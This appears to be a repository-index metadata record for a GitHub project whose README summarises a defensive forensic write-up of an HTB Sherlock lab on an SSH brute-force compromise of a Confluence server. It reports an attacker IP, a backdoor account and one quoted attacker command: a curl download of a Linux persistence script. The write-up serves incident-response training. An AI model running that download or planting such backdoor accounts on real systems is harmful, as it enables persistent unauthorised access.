{"id":31208011,"url":"https://github.com/lenardjombo/brutus","last_synced_at":"2025-09-20T22:51:37.959Z","repository":{"id":315274433,"uuid":"1058795910","full_name":"lenardjombo/Brutus","owner":"lenardjombo","description":"Exploring a scenario where a Confluence server was brute-forced via its SSH service","archived":false,"fork":false,"pushed_at":"2025-09-17T16:02:01.000Z","size":11,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-09-17T18:43:23.267Z","etag":null,"topics":["brutus","cybersecurity","dfir"],"latest_commit_sha":null,"homepage":"https://labs.hackthebox.com/achievement/sherlock/2622871/631","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lenardjombo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-09-17T14:59:53.000Z","updated_at":"2025-09-17T16:02:04.000Z","dependencies_parsed_at":"2025-09-17T18:43:24.892Z","dependency_job_id":"61d95749-ba81-4519-931b-c1b942548f01","html_url":"https://github.com/lenardjombo/Brutus","commit_stats":null,"previous_names":["lenardjombo/brutus"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/lenardjombo/Brutus","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lenardjombo","download_url":"https://codeload.github.com/lenardjombo/Brutus/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lenardjombo%2FBrutus/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":276169661,"owners_count":25596956,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-20T02:00:10.207Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["brutus","cybersecurity","dfir"],"created_at":"2025-09-20T22:51:36.716Z","updated_at":"2025-09-20T22:51:37.954Z","avatar_url":"https://github.com/lenardjombo.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"Sherlock — SSH / auth.log \u0026 wtmp Analysis\nOverview\n\nThis project analyzes the auth.log and wtmp artifacts from the HTB Sherlock challenge to investigate an SSH brute-force compromise against a Confluence server. The investigation included:\n\nIdentifying the brute-force source IP and confirming successful authentication.\n\nCorrelating auth.log events with wtmp records (using utmp.py) to determine when an interactive terminal session was established and its session number.\n\nTracing post-exploitation activity: creation of a backdoor user and evidence of privileged commands used to download an external script.\n\nProducing a clear timeline, sanitized evidence, and recommendations for remediation.\n\nKey findings (short)\n\nAttacker IP: 65.2.161.68\n\nCompromised user: root\n\nInteractive login (UTC): 2024-03-06 06:32:45\n\nSession number: 37\n\nBackdoor account: cyberjunkie (MITRE: T1136.001)\n\nObserved privileged download: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh\n\nImportance to cybersecurity\n\nLogs such as auth.log and wtmp are critical sources for incident detection and forensic reconstruction. By correlating authentication events with session records and command evidence, defenders can:\n\nDetermine how attackers gained initial access and what actions followed the compromise.\n\nIdentify persistence mechanisms (e.g., new accounts) and remove them before further damage.\n\nRecommend concrete hardening steps (disable root SSH, enforce key-based authentication, enable rate-limiting and 2FA) to reduce future risk.\n\nThis exercise demonstrates practical skills in log analysis, timeline building, and evidence sanitization — all core capabilities for defenders, incident responders, and forensic analysts.\n\nUsage\n\nThe repository includes sanitized logs, utmp.py and writeup.md. These can be used to reproduce the analysis:\n\nParse wtmp with last -f wtmp or python utmp.py wtmp.\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flenardjombo%2Fbrutus","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flenardjombo%2Fbrutus","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flenardjombo%2Fbrutus/lists"}